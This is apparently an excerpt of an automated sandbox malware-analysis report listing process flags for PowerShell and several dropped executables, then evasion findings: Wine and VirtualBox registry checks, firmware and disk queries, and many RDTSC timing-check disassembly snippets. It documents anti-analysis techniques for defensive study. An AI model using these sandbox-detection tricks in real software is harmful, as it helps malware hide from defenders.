Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E000B second address: 5DF807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F28C47EE2BEh 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1B71h], esi 0x00000013 pushad 0x00000014 mov edx, dword ptr [ebp+122D27B6h] 0x0000001a call 00007F28C47EE2C7h 0x0000001f xor dword ptr [ebp+122D179Ch], eax 0x00000025 pop edi 0x00000026 popad 0x00000027 push dword ptr [ebp+122D0C41h] 0x0000002d mov dword ptr [ebp+122D2423h], edi 0x00000033 call dword ptr [ebp+122D35E5h] 0x00000039 pushad 0x0000003a pushad 0x0000003b jmp 00007F28C47EE2C9h 0x00000040 mov bx, di 0x00000043 popad 0x00000044 clc 0x00000045 xor eax, eax 0x00000047 cmc 0x00000048 mov edx, dword ptr [esp+28h] 0x0000004c mov dword ptr [ebp+122D2E76h], eax 0x00000052 mov dword ptr [ebp+122D27C6h], eax 0x00000058 stc 0x00000059 mov esi, 0000003Ch 0x0000005e jnl 00007F28C47EE2CDh 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 pushad 0x00000069 sub bh, 00000056h 0x0000006c sub dword ptr [ebp+122D2E76h], ebx 0x00000072 popad 0x00000073 lodsw 0x00000075 mov dword ptr [ebp+122D2E76h], ecx 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f clc 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007F28C47EE2C5h 0x00000089 nop 0x0000008a pushad 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F28C47EE2C0h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753FE8 second address: 753FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753FF0 second address: 753FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75958D second address: 759597 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759597 second address: 75959C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759860 second address: 759891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C4758087h 0x00000008 jnc 00007F28C4758076h 0x0000000e jmp 00007F28C475807Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7599FA second address: 7599FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7599FE second address: 759A0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F28C4758082h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759A0C second address: 759A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B656 second address: 75B65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B765 second address: 75B79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b jmp 00007F28C47EE2BDh 0x00000010 pop edx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F28C47EE2C6h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B79A second address: 75B84B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push esi 0x0000000f jmp 00007F28C4758084h 0x00000014 pop esi 0x00000015 pop eax 0x00000016 jmp 00007F28C475807Ch 0x0000001b push 00000003h 0x0000001d sub dword ptr [ebp+122D2568h], ebx 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 mov cx, A4AEh 0x0000002a popad 0x0000002b mov edi, dword ptr [ebp+122D29FAh] 0x00000031 push 00000003h 0x00000033 pushad 0x00000034 jc 00007F28C475807Ch 0x0000003a sub dword ptr [ebp+122D193Dh], ecx 0x00000040 popad 0x00000041 call 00007F28C4758079h 0x00000046 jmp 00007F28C4758084h 0x0000004b push eax 0x0000004c jmp 00007F28C475807Bh 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 push eax 0x00000056 jnp 00007F28C4758078h 0x0000005c pop eax 0x0000005d mov eax, dword ptr [eax] 0x0000005f jmp 00007F28C4758082h 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 push edi 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B84B second address: 75B84F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B84F second address: 75B853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75B935 second address: 75B93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BA82 second address: 75BABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b sub edx, 68AC6C84h 0x00000011 jo 00007F28C475807Ch 0x00000017 mov dword ptr [ebp+122D2FD5h], eax 0x0000001d push 00000000h 0x0000001f mov edx, eax 0x00000021 push 3496FDC6h 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007F28C4758078h 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BABA second address: 75BB82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F28C47EE2C1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 3496FD46h 0x00000014 pushad 0x00000015 xor dword ptr [ebp+122D2EFEh], edx 0x0000001b mov dword ptr [ebp+122D2423h], ecx 0x00000021 popad 0x00000022 push 00000003h 0x00000024 jmp 00007F28C47EE2C0h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F28C47EE2B8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 push 00000003h 0x00000047 mov dword ptr [ebp+122D2FDFh], ebx 0x0000004d jmp 00007F28C47EE2C9h 0x00000052 call 00007F28C47EE2B9h 0x00000057 push ecx 0x00000058 jmp 00007F28C47EE2C4h 0x0000005d pop ecx 0x0000005e push eax 0x0000005f jmp 00007F28C47EE2C5h 0x00000064 mov eax, dword ptr [esp+04h] 0x00000068 push eax 0x00000069 push edx 0x0000006a js 00007F28C47EE2BCh 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BB82 second address: 75BB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BB86 second address: 75BBB0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F28C47EE2CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F28C47EE2B6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BBB0 second address: 75BBBA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BBBA second address: 75BBF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d jmp 00007F28C47EE2C0h 0x00000012 pop eax 0x00000013 pop eax 0x00000014 mov dword ptr [ebp+122D2568h], ecx 0x0000001a lea ebx, dword ptr [ebp+1244F5B9h] 0x00000020 mov edx, 1AA54481h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F28C47EE2BAh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75BBF7 second address: 75BC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76E5CE second address: 76E5D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76E5D4 second address: 76E5E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C4758081h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BC3B second address: 77BC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BC40 second address: 77BC45 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BC45 second address: 77BC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C4h 0x00000009 pop ebx 0x0000000a ja 00007F28C47EE2BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BEDD second address: 77BEED instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C4758076h 0x00000008 jng 00007F28C4758076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77BEED second address: 77BF10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F28C47EE2C9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C4D0 second address: 77C4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C4D6 second address: 77C4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C4DA second address: 77C4E4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C63A second address: 77C63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C7C9 second address: 77C7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C7D6 second address: 77C7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77C7DE second address: 77C7F1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F28C4758076h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CABF second address: 77CADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C4h 0x00000007 ja 00007F28C47EE2BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 771EFF second address: 771F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77CD94 second address: 77CD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D34F second address: 77D38F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F28C4758076h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F28C4758076h 0x00000011 popad 0x00000012 push esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b jmp 00007F28C4758083h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007F28C475807Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D4DC second address: 77D4E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D4E4 second address: 77D4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D4E8 second address: 77D4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F28C47EE2BEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D646 second address: 77D67E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758084h 0x00000007 jnc 00007F28C475808Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D67E second address: 77D682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D682 second address: 77D686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
